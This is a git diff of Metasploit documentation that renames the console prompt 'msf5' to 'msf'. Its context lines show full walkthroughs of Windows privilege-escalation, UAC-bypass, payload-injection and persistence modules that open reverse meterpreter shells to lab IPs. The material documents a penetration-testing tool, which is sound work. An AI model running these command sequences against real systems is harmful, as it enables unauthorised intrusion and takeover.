exploit/windows/local/bypassuac_dotnet_profiler -msf5 exploit(windows/local/bypassuac_dotnet_profiler) > set session 6 +msf exploit(multi/handler) > use exploit/windows/local/bypassuac_dotnet_profiler +msf exploit(windows/local/bypassuac_dotnet_profiler) > set session 6 session => 6 -msf5 exploit(windows/local/bypassuac_dotnet_profiler) > show options +msf exploit(windows/local/bypassuac_dotnet_profiler) > show options Module options (exploit/windows/local/bypassuac_dotnet_profiler): @@ -105,7 +105,7 @@ Exploit target: 0 Windows x64 -msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run +msf exploit(windows/local/bypassuac_dotnet_profiler) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] UAC is Enabled, checking level... diff --git a/documentation/modules/exploit/windows/local/bypassuac_sdclt.md b/documentation/modules/exploit/windows/local/bypassuac_sdclt.md index df3258986b..40c106e169 100644 --- a/documentation/modules/exploit/windows/local/bypassuac_sdclt.md +++ b/documentation/modules/exploit/windows/local/bypassuac_sdclt.md @@ -18,7 +18,7 @@ system's sdclt.exe binary to run as a higher integrity process. ### Windows 10.0.17134 x64 ``` -msf5 exploit(windows/local/bypassuac_sdclt) > show options +msf exploit(windows/local/bypassuac_sdclt) > show options Module options (exploit/windows/local/bypassuac_sdclt): @@ -44,7 +44,7 @@ Exploit target: 0 Windows x64 -msf5 exploit(windows/local/bypassuac_sdclt) > run +msf exploit(windows/local/bypassuac_sdclt) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] UAC is Enabled, checking level... diff --git a/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md b/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md index 840d45dd81..2b51414233 100644 --- a/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md +++ b/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md @@ -20,7 +20,7 @@ be saved in a script file somewhere, it cannot be run directly from powershell o ## Scenarios ``` -msf5 > sessions +msf > sessions Active sessions =============== @@ -29,14 +29,14 @@ Active sessions -- ---- ---- ----------- ---------- 6 meterpreter x86/windows DESKTOP-T2TGIHP\Carter @ DESKTOP-T2TGIHP 192.168.1.x:4444 -> 192.168.1.x:53685 (192.168.1.x) -msf5 > use exploit/windows/local/bypassuac_silentcleanup -msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 6 +msf > use exploit/windows/local/bypassuac_silentcleanup +msf exploit(windows/local/bypassuac_silentcleanup) > set SESSION 6 SESSION => 6 -msf5 exploit(windows/local/bypassuac_silentcleanup) > set PAYLOAD windows/x64/meterpreter/reverse_tcp +msf exploit(windows/local/bypassuac_silentcleanup) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 192.168.1.xx +msf exploit(windows/local/bypassuac_silentcleanup) > set LHOST 192.168.1.xx LHOST => 192.168.1.xx -msf5 exploit(windows/local/bypassuac_silentcleanup) > options +msf exploit(windows/local/bypassuac_silentcleanup) > options Module options (exploit/windows/local/bypassuac_silentcleanup): @@ -62,7 +62,7 @@ Exploit target: 0 Microsoft Windows -msf5 exploit(windows/local/bypassuac_silentcleanup) > run +msf exploit(windows/local/bypassuac_silentcleanup) > run [*] Started reverse TCP handler on 192.168.1.xx:4444 [+] Part of Administrators group! Continuing... @@ -73,5 +73,5 @@ meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > bg [*] Backgrounding session 10... -msf5 exploit(windows/local/bypassuac_silentcleanup) > +msf exploit(windows/local/bypassuac_silentcleanup) > ``` diff --git a/documentation/modules/exploit/windows/local/bypassuac_windows_store_reg.md b/documentation/modules/exploit/windows/local/bypassuac_windows_store_reg.md index 4b969600e3..595b0d8dab 100644 --- a/documentation/modules/exploit/windows/local/bypassuac_windows_store_reg.md +++ b/documentation/modules/exploit/windows/local/bypassuac_windows_store_reg.md @@ -22,7 +22,7 @@ privileges. ### Windows 10.0.17134.885 x64 ``` -msf5 exploit(windows/local/bypassuac_windows_store_reg) > run +msf exploit(windows/local/bypassuac_windows_store_reg) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] UAC is Enabled, checking level... diff --git a/documentation/modules/exploit/windows/local/comahawk.md b/documentation/modules/exploit/windows/local/comahawk.md index 1f12fb79de..3f1336bf9d 100644 --- a/documentation/modules/exploit/windows/local/comahawk.md +++ b/documentation/modules/exploit/windows/local/comahawk.md @@ -46,16 +46,16 @@ meterpreter > getsystem [-] Token Duplication (In Memory/Admin) meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use exploit/windows/local/comahawk -msf5 exploit(windows/local/comahawk) > set versbose true +msf exploit(multi/handler) > use exploit/windows/local/comahawk +msf exploit(windows/local/comahawk) > set versbose true versbose => true -msf5 exploit(windows/local/comahawk) > set session 1 +msf exploit(windows/local/comahawk) > set session 1 session => 1 -msf5 exploit(windows/local/comahawk) > set payload windows/x64/meterpreter/reverse_tcp +msf exploit(windows/local/comahawk) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/local/comahawk) > set lhost 192.168.135.168 +msf exploit(windows/local/comahawk) > set lhost 192.168.135.168 lhost => 192.168.135.168 -msf5 exploit(windows/local/comahawk) > show options +msf exploit(windows/local/comahawk) > show options Module options (exploit/windows/local/comahawk): @@ -85,7 +85,7 @@ Exploit target: 0 Windows x64 -msf5 exploit(windows/local/comahawk) > run +msf exploit(windows/local/comahawk) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] Attempting to PrivEsc on DESKTOP-D1E425Q via session ID: 1 diff --git a/documentation/modules/exploit/windows/local/cve_2018_8453_win32k_priv_esc.md b/documentation/modules/exploit/windows/local/cve_2018_8453_win32k_priv_esc.md index 7929655d54..18cf6c596b 100644 --- a/documentation/modules/exploit/windows/local/cve_2018_8453_win32k_priv_esc.md +++ b/documentation/modules/exploit/windows/local/cve_2018_8453_win32k_priv_esc.md @@ -17,7 +17,7 @@ This module has been tested with Windows 10 v1703 x86. Offsets within the soluti ### Windows 10 v1703 x86 ``` -msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > sessions +msf exploit(windows/local/cve_2018_8453_win32k_priv_esc) > sessions Active sessions =============== @@ -26,9 +26,9 @@ Active sessions -- ---- ---- ----------- ---------- 1 meterpreter x86/windows DESKTOP-T6J3V2L\testuser @ DESKTOP-T6J3V2L 172.22.222.136:4444 -> 172.22.222.130:49693 (172.22.222.130) -msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > set session 1 +msf exploit(windows/local/cve_2018_8453_win32k_priv_esc) > set session 1 session => 1 -msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > exploit +msf exploit(windows/local/cve_2018_8453_win32k_priv_esc) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [+] Exploit finished, wait for privileged payload execution to complete. @@ -49,5 +49,5 @@ meterpreter > exit [*] Shutting down Meterpreter... [*] 172.22.222.130 - Meterpreter session 2 closed. Reason: User exit -msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > +msf exploit(windows/local/cve_2018_8453_win32k_priv_esc) > ``` diff --git a/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md b/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md index 751dba8bab..5801b0ced4 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md +++ b/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md @@ -124,16 +124,16 @@ meterpreter > getsystem [-] Token Duplication (In Memory/Admin) meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use exploit/windows/local/cve_2020_0668_service_tracing -msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set payload windows/x64/meterpreter/reverse_tcp +msf exploit(multi/handler) > use exploit/windows/local/cve_2020_0668_service_tracing +msf exploit(windows/local/cve_2020_0668_service_tracing) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set lhost 192.168.135.168 +msf exploit(windows/local/cve_2020_0668_service_tracing) > set lhost 192.168.135.168 lhost => 192.168.135.168 -msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set verbose true +msf exploit(windows/local/cve_2020_0668_service_tracing) > set verbose true verbose => true -msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set session 1 +msf exploit(windows/local/cve_2020_0668_service_tracing) > set session 1 session => 1 -msf5 exploit(windows/local/cve_2020_0668_service_tracing) > show options +msf exploit(windows/local/cve_2020_0668_service_tracing) > show options Module options (exploit/windows/local/cve_2020_0668_service_tracing): @@ -162,7 +162,7 @@ Exploit target: 0 Windows x64 -msf5 exploit(windows/local/cve_2020_0668_service_tracing) > run +msf exploit(windows/local/cve_2020_0668_service_tracing) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] Build Number = 17134 diff --git a/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md b/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md index e35dc374d0..51631ddbaa 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md +++ b/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md @@ -54,7 +54,7 @@ vulnerability. ### Windows 10 v1909 x64 - Build 18363.418 ``` -msf5 exploit(multi/handler) > exploit +msf exploit(multi/handler) > exploit [*] Started bind TCP handler against 172.26.22.128:4444 [*] Sending stage (201283 bytes) to 172.26.22.128 @@ -77,8 +77,8 @@ meterpreter > getsystem [-] Token Duplication (In Memory/Admin) meterpreter > background [*] Backgrounding session 2... -msf5 exploit(multi/handler) > use exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options +msf exploit(multi/handler) > use exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move): @@ -105,9 +105,9 @@ Exploit target: 0 Windows DLL Dropper -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set PAYLOAD windows/x64/meterpreter/bind_tcp +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set PAYLOAD windows/x64/meterpreter/bind_tcp PAYLOAD => windows/x64/meterpreter/bind_tcp -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move): @@ -134,11 +134,11 @@ Exploit target: 0 Windows DLL Dropper -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set RHOST 172.26.22.128 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set RHOST 172.26.22.128 RHOST => 172.26.22.128 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set LPORT 9988 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set LPORT 9988 LPORT => 9988 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move): @@ -165,11 +165,11 @@ Exploit target: 0 Windows DLL Dropper -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set SESSIOn 2 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set SESSIOn 2 SESSIOn => 2 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set JOB_WAIT_TIME 40 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set JOB_WAIT_TIME 40 JOB_WAIT_TIME => 40 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > exploit +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > exploit [*] Step #1: Checking target environment... [*] Step #2: Generating the malicious DLL... @@ -220,7 +220,7 @@ meterpreter > ### Windows 10 v1903 x86 - Build 18362.30 ``` -msf5 exploit(multi/handler) > show options +msf exploit(multi/handler) > show options Module options (exploit/multi/handler): @@ -244,7 +244,7 @@ Exploit target: 0 Wildcard Target -msf5 exploit(multi/handler) > exploit +msf exploit(multi/handler) > exploit [*] Started bind TCP handler against 172.26.17.231:4444 [*] Sending stage (176195 bytes) to 172.26.17.231 @@ -267,12 +267,12 @@ meterpreter > getsystem [-] Token Duplication (In Memory/Admin) meterpreter > background [*] Backgrounding session 4... -msf5 exploit(multi/handler) > use exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set PAYLOAD windows/meterpreter/bind_tcp +msf exploit(multi/handler) > use exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set SESSION 4 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set SESSION 4 SESSION => 4 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move): @@ -299,13 +299,13 @@ Exploit target: 0 Windows DLL Dropper -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set RHOST 172.26.17.231 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set RHOST 172.26.17.231 RHOST => 172.26.17.231 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set LPORT 8822 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set LPORT 8822 LPORT => 8822 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set JOB_WAIT_TIME 30 +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set JOB_WAIT_TIME 30 JOB_WAIT_TIME => 30 -msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > exploit +msf exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > exploit [*] Step #1: Checking target environment... [*] Step #2: Generating the malicious DLL... diff --git a/documentation/modules/exploit/windows/local/cve_2020_0796_smbghost.md b/documentation/modules/exploit/windows/local/cve_2020_0796_smbghost.md index 45652d5614..01970bd5f5 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_0796_smbghost.md +++ b/documentation/modules/exploit/windows/local/cve_2020_0796_smbghost.md @@ -34,7 +34,7 @@ box. The default setting is to have SMBv3 compression enabled. ### Windows 10 Version 1909 Build 18363.418 x64 ``` -msf5 exploit(windows/local/cve_2020_0796_smbghost) > sessions -i -1 +msf exploit(windows/local/cve_2020_0796_smbghost) > sessions -i -1 [*] Starting interaction with 1... meterpreter > getuid @@ -54,7 +54,7 @@ meterpreter > getsystem [-] Token Duplication (In Memory/Admin) meterpreter > background [*] Backgrounding session 1... -msf5 exploit(windows/local/cve_2020_0796_smbghost) > show options +msf exploit(windows/local/cve_2020_0796_smbghost) > show options Module options (exploit/windows/local/cve_2020_0796_smbghost): @@ -79,7 +79,7 @@ Exploit target: 0 Windows 10 v1903-1909 x64 -msf5 exploit(windows/local/cve_2020_0796_smbghost) > exploit +msf exploit(windows/local/cve_2020_0796_smbghost) > exploit [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Executing automatic check (disable AutoCheck to override) @@ -94,4 +94,4 @@ Server username: NT AUTHORITY\SYSTEM meterpreter > ``` -[1]: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005 \ No newline at end of file +[1]: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005 diff --git a/documentation/modules/exploit/windows/local/docker_credential_wincred.md b/documentation/modules/exploit/windows/local/docker_credential_wincred.md index 61e248b673..2ca4070ef7 100644 --- a/documentation/modules/exploit/windows/local/docker_credential_wincred.md +++ b/documentation/modules/exploit/windows/local/docker_credential_wincred.md @@ -19,7 +19,7 @@ ### Tested on Docker Community Edition 2.0.0.0 running on Windows 10x64 Release 1803 ``` -msf5 exploit(windows/local/docker_credential_wincred) > show options +msf exploit(windows/local/docker_credential_wincred) > show options Module options (exploit/windows/local/docker_credential_wincred): @@ -36,13 +36,13 @@ Exploit target: 0 Automatic -msf5 exploit(windows/local/docker_credential_wincred) > set session 1 +msf exploit(windows/local/docker_credential_wincred) > set session 1 session => 1 -msf5 exploit(windows/local/docker_credential_wincred) > check +msf exploit(windows/local/docker_credential_wincred) > check [*] Docker version 18.09.0, build 4d60db4 [*] The target appears to be vulnerable. -msf5 exploit(windows/local/docker_credential_wincred) > run +msf exploit(windows/local/docker_credential_wincred) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] Docker version 18.09.0, build 4d60db4 diff --git a/documentation/modules/exploit/windows/local/gog_galaxyclientservice_privesc.md b/documentation/modules/exploit/windows/local/gog_galaxyclientservice_privesc.md index 1e0944547d..6e18362aad 100644 --- a/documentation/modules/exploit/windows/local/gog_galaxyclientservice_privesc.md +++ b/documentation/modules/exploit/windows/local/gog_galaxyclientservice_privesc.md @@ -24,12 +24,12 @@ The initial working directory of the command. ### GOG Galaxy Client `v1.2.66.64` on Windows 10 ``` -msf5 > use multi/handler -msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp +msf > use multi/handler +msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(multi/handler) > set lhost 192.168.37.1 +msf exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (201283 bytes) to 192.168.37.131 @@ -47,16 +47,16 @@ Logged On Users : 15 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use exploit/windows/local/gog_galaxyclientservice_privesc -msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set session 1 +msf exploit(multi/handler) > use exploit/windows/local/gog_galaxyclientservice_privesc +msf exploit(windows/local/gog_galaxyclientservice_privesc) > set session 1 session => 1 -msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set payload windows/x64/meterpreter/reverse_tcp +msf exploit(windows/local/gog_galaxyclientservice_privesc) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set lhost 192.168.37.1 +msf exploit(windows/local/gog_galaxyclientservice_privesc) > set lhost 192.168.37.1 lhost => 192.168.37.1 -msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > check +msf exploit(windows/local/gog_galaxyclientservice_privesc) > check [*] The target appears to be vulnerable. Vulnerable version found: 1.2.66.64 -msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > run +msf exploit(windows/local/gog_galaxyclientservice_privesc) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Starting GalaxyClientService... diff --git a/documentation/modules/exploit/windows/local/mov_ss.md b/documentation/modules/exploit/windows/local/mov_ss.md index acceb5caea..c2421767a8 100644 --- a/documentation/modules/exploit/windows/local/mov_ss.md +++ b/documentation/modules/exploit/windows/local/mov_ss.md @@ -14,7 +14,7 @@ test it on a real machine if possible. ## Verification Steps ``` -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.135.111:4567 [*] Sending stage (206403 bytes) to 192.168.136.142 @@ -31,8 +31,8 @@ Logged On Users : 2 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use exploit/windows/local/mov_ss -msf5 exploit(windows/local/mov_ss) > show options +msf exploit(multi/handler) > use exploit/windows/local/mov_ss +msf exploit(windows/local/mov_ss) > show options Module options (exploit/windows/local/mov_ss): @@ -61,13 +61,13 @@ Exploit target: 0 Windows x64 -msf5 exploit(windows/local/mov_ss) > set payload windows/x64/meterpreter/reverse_tcp +msf exploit(windows/local/mov_ss) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/local/mov_ss) > set lhost 192.168.135.111 +msf exploit(windows/local/mov_ss) > set lhost 192.168.135.111 lhost => 192.168.135.111 -msf5 exploit(windows/local/mov_ss) > set lport 4567 +msf exploit(windows/local/mov_ss) > set lport 4567 lport => 4567 -msf5 exploit(windows/local/mov_ss) > run +msf exploit(windows/local/mov_ss) > run [*] Started reverse TCP handler on 192.168.135.111:4567 [*] Attempting to PrivEsc on DESKTOP-QGIC71I via session ID: 1 @@ -83,9 +83,9 @@ meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.136.142 - Meterpreter session 3 closed. Reason: User exit -msf5 exploit(windows/local/mov_ss) > set USE_INJECTION false +msf exploit(windows/local/mov_ss) > set USE_INJECTION false USE_INJECTION => false -msf5 exploit(windows/local/mov_ss) > run +msf exploit(windows/local/mov_ss) > run [*] Started reverse TCP handler on 192.168.135.111:4567 [*] Attempting to PrivEsc on DESKTOP-QGIC71I via session ID: 1 @@ -94,7 +94,7 @@ msf5 exploit(windows/local/mov_ss) > run [*] Running exploit C:\Users\msfuser\AppData\Local\Temp\ACLgNJAJ.exe with payload C:\Users\msfuser\AppData\Local\Temp\kWDncKCjHtb.exe [*] Sending stage (206403 bytes) to 192.168.136.142 ^C[-] Exploit failed: Interrupt -msf5 exploit(windows/local/mov_ss) > sessions -l +msf exploit(windows/local/mov_ss) > sessions -l Active sessions =============== @@ -104,7 +104,7 @@ Active sessions 1 meterpreter x64/windows DESKTOP-QGIC71I\msfuser @ DESKTOP-QGIC71I 192.168.135.111:4567 -> 192.168.136.142:49696 (192.168.136.142) 4 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-QGIC71I 192.168.135.111:4567 -> 192.168.136.142:49699 (192.168.136.142) -msf5 exploit(windows/local/mov_ss) > exit +msf exploit(windows/local/mov_ss) > exit ``` ## Build Instructions diff --git a/documentation/modules/exploit/windows/local/ntusermndragover.md b/documentation/modules/exploit/windows/local/ntusermndragover.md index 91843af89c..d9fb16cc98 100644 --- a/documentation/modules/exploit/windows/local/ntusermndragover.md +++ b/documentation/modules/exploit/windows/local/ntusermndragover.md @@ -29,7 +29,7 @@ other versions of Windows, such as Windows Server 2008. ### Windows 7 SP0 x86 ``` -msf5 exploit(multi/handler) > sessions +msf exploit(multi/handler) > sessions Active sessions =============== @@ -38,16 +38,16 @@ Active sessions -- ---- ---- ----------- ---------- 1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.15:49158 (192.168.56.15) -msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover -msf5 exploit(windows/local/ntusermndragover) > set session 1 +msf exploit(multi/handler) > use exploit/windows/local/ntusermndragover +msf exploit(windows/local/ntusermndragover) > set session 1 session => 1 -msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1 +msf exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555 +msf exploit(windows/local/ntusermndragover) > set LPORT 5555 LPORT => 5555 -msf5 exploit(windows/local/ntusermndragover) > run +msf exploit(windows/local/ntusermndragover) > run [*] Started reverse TCP handler on 192.168.56.1:5555 [*] Executing automatic check (disable AutoCheck to override) @@ -74,7 +74,7 @@ meterpreter > ``` -msf5 exploit(multi/handler) > sessions +msf exploit(multi/handler) > sessions Active sessions =============== @@ -83,16 +83,16 @@ Active sessions -- ---- ---- ----------- ---------- 1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.5:49157 (192.168.56.5) -msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover -msf5 exploit(windows/local/ntusermndragover) > set session 1 +msf exploit(multi/handler) > use exploit/windows/local/ntusermndragover +msf exploit(windows/local/ntusermndragover) > set session 1 session => 1 -msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1 +msf exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555 +msf exploit(windows/local/ntusermndragover) > set LPORT 5555 LPORT => 5555 -msf5 exploit(windows/local/ntusermndragover) > run +msf exploit(windows/local/ntusermndragover) > run [*] Started reverse TCP handler on 192.168.56.1:5555 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/windows/local/payload_inject.md b/documentation/modules/exploit/windows/local/payload_inject.md index 0626ddea0d..64c68124f8 100644 --- a/documentation/modules/exploit/windows/local/payload_inject.md +++ b/documentation/modules/exploit/windows/local/payload_inject.md @@ -13,7 +13,7 @@ Windows Metro apps like Calc or Edge will crash if you try and use them as the ` ## Options ``` -msf5 exploit(windows/local/payload_inject) > show options +msf exploit(windows/local/payload_inject) > show options Module options (exploit/windows/local/payload_inject): @@ -42,7 +42,7 @@ Make sure that the `SESSION` value is set to the existing session identifier. ## Scenarios ### Windows 10x64 Build 17134 No PID ``` -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.135.168:5555 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used @@ -62,8 +62,8 @@ Logged On Users : 2 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject -msf5 exploit(windows/local/payload_inject) > show options +msf exploit(multi/handler) > use exploit/windows/local/payload_inject +msf exploit(windows/local/payload_inject) > show options Module options (exploit/windows/local/payload_inject): @@ -83,13 +83,13 @@ Exploit target: 0 Windows -msf5 exploit(windows/local/payload_inject) > set session 1 +msf exploit(windows/local/payload_inject) > set session 1 session => 1 -msf5 exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp +msf exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/local/payload_inject) > set lhost 192.168.135.168 +msf exploit(windows/local/payload_inject) > set lhost 192.168.135.168 lhost => 192.168.135.168 -msf5 exploit(windows/local/payload_inject) > show options +msf exploit(windows/local/payload_inject) > show options Module options (exploit/windows/local/payload_inject): @@ -118,7 +118,7 @@ Exploit target: 0 Windows -msf5 exploit(windows/local/payload_inject) > run +msf exploit(windows/local/payload_inject) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] Running module against DESKTOP-D1E425Q @@ -160,9 +160,9 @@ meterpreter > ### Windows 10x64 Build 17134 No PID ``` -msf5 exploit(windows/local/payload_inject) > set PPID 3632 +msf exploit(windows/local/payload_inject) > set PPID 3632 PPID => 3632 -msf5 exploit(windows/local/payload_inject) > show options +msf exploit(windows/local/payload_inject) > show options Module options (exploit/windows/local/payload_inject): @@ -191,7 +191,7 @@ Exploit target: 0 Windows -msf5 exploit(windows/local/payload_inject) > run +msf exploit(windows/local/payload_inject) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] Running module against DESKTOP-D1E425Q diff --git a/documentation/modules/exploit/windows/local/persistence_image_exec_options.md b/documentation/modules/exploit/windows/local/persistence_image_exec_options.md index 794fc1d192..198b574387 100644 --- a/documentation/modules/exploit/windows/local/persistence_image_exec_options.md +++ b/documentation/modules/exploit/windows/local/persistence_image_exec_options.md @@ -25,12 +25,12 @@ meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > background [*] Backgrounding session 8... -msf5 exploit(multi/handler) > use exploit/windows/local/persistence_image_exec_options -msf5 exploit(windows/local/persistence_image_exec_options) > set image_file notepad.exe +msf exploit(multi/handler) > use exploit/windows/local/persistence_image_exec_options +msf exploit(windows/local/persistence_image_exec_options) > set image_file notepad.exe image_file => notepad.exe -msf5 exploit(windows/local/persistence_image_exec_options) > set session 8 +msf exploit(windows/local/persistence_image_exec_options) > set session 8 session => 8 -msf5 exploit(windows/local/persistence_image_exec_options) > run +msf exploit(windows/local/persistence_image_exec_options) > run [*] Attempting Persistence on DESKTOP-D1E425Q via session ID: 8 [*] Payload pathname = C:\Users\msfuser\AppData\Local\Temp\xEaiLUS.exe @@ -38,7 +38,7 @@ msf5 exploit(windows/local/persistence_image_exec_options) > run [*] Writing ReportingMode to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe [*] Writing MonitorProcess to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe [*] Payload (7168 bytes) uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\xEaiLUS.exe -msf5 exploit(windows/local/persistence_image_exec_options) > show options +msf exploit(windows/local/persistence_image_exec_options) > show options Module options (exploit/windows/local/persistence_image_exec_options): @@ -68,14 +68,14 @@ Exploit target: 